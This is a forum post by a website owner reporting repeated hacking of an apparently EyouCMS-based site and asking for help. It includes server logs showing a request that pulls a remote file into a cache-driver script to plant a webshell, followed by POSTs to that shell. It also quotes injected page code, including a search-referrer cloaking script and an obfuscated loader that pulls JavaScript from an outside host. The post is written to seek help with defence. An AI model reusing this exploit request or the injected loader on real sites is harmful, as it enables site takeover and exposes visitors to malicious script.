老是被黑客挂马，获取了日志，请高手帮忙看下什么问题？

网站中毒

154.89.4.7 - - [30/Dec/2023:15:36:04 +0800] "GET /core/library/think/cache/driver/content.php?name=homes.php&url=http://link.hao-ta.com/1.txt HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
154.89.4.7 - - [30/Dec/2023:15:36:07 +0800] "GET / HTTP/1.1" 200 9476 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:08 +0800] "GET /template/mobile/skin/Lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://www.wang.com/template/mobile/skin/Lib/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:09 +0800] "POST /index.php?m=api&c=Diyajax&a=check_userinfo HTTP/1.1" 200 136 "https://www.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:14 +0800] "GET /uploads/allimg/20231229/1-23122911143Q52.webp HTTP/1.1" 200 34658 "https://www.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:15 +0800] "GET /core/library/think/cache/driver/homes.php HTTP/1.1" 200 834 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
154.89.4.7 - - [30/Dec/2023:15:36:17 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3370 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
120.229.46.166 - - [30/Dec/2023:15:36:17 +0800] "GET /login.php?m=admin&c=Notify&a=count_unread_notify&_ajax=1&lang=cn HTTP/1.1" 200 147 "https://www.wang.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
180.101.244.14 - - [30/Dec/2023:15:36:20 +0800] "GET /template/mobile/skin/Lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://unopengis.wang.com/template/mobile/skin/Lib/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:22 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3740 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
180.101.244.14 - - [30/Dec/2023:15:36:30 +0800] "GET /uploads/allimg/20231229/1-23122911143Q52.webp HTTP/1.1" 200 34658 "https://unopengis.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"
59.83.208.107 - - [30/Dec/2023:15:36:35 +0800] "POST /index.php?m=api&c=Diyajax&a=check_userinfo HTTP/1.1" 200 136 "https://unopengis.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"
114.119.158.94 - - [30/Dec/2023:15:36:37 +0800] "GET /robots.txt HTTP/1.1" 404 1108 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
154.89.4.7 - - [30/Dec/2023:15:36:38 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3807 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
154.89.4.7 - - [30/Dec/2023:15:36:45 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3859 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
49.71.133.148 - - [30/Dec/2023:15:36:46 +0800] "GET /beijing/chengxiang/ HTTP/1.1" 404 1108 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
154.89.4.7 - - [30/Dec/2023:15:37:04 +0800] "GET /wumim.php HTTP/1.1" 200 3358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
以上是 被注入文件的日志。网址用wang.com代替了

wumim.php 是黑客的上传的病毒文件
并修改了 mobile 和 pc的 首页 index文件加了如下代码
<script>  var referrer = document.referrer;  var searchEngines = [\\\'baidu\\\', \\\'so\\\', \\\'yisuo\\\', \\\'sogou\\\'];  var isFromSearchEngine = searchEngines.some(function(engine) {return referrer.indexOf(engine) !== -1;  });  if (!isFromSearchEngine) {document.title = "{eyou:global name=\\\'web_title\\\' /}-{eyou:global name=\\\'web_name\\\' /}";  }</script>

<script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,121,117,97,110,46,100,97,100,100,53,54,57,54,46,116,111,112,47,97,121,117,97,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>

感觉系统还是有漏洞很容易就被黑客上传文件了

请官方重视这个漏洞问题

网站都有升级到最新版本了而且我整站都下载下来全部用护卫神河马专杀全部查一遍了

几次三番被挂马了

现在网站权重都降低了

2023年12月30日 | 998人阅读

好问题 0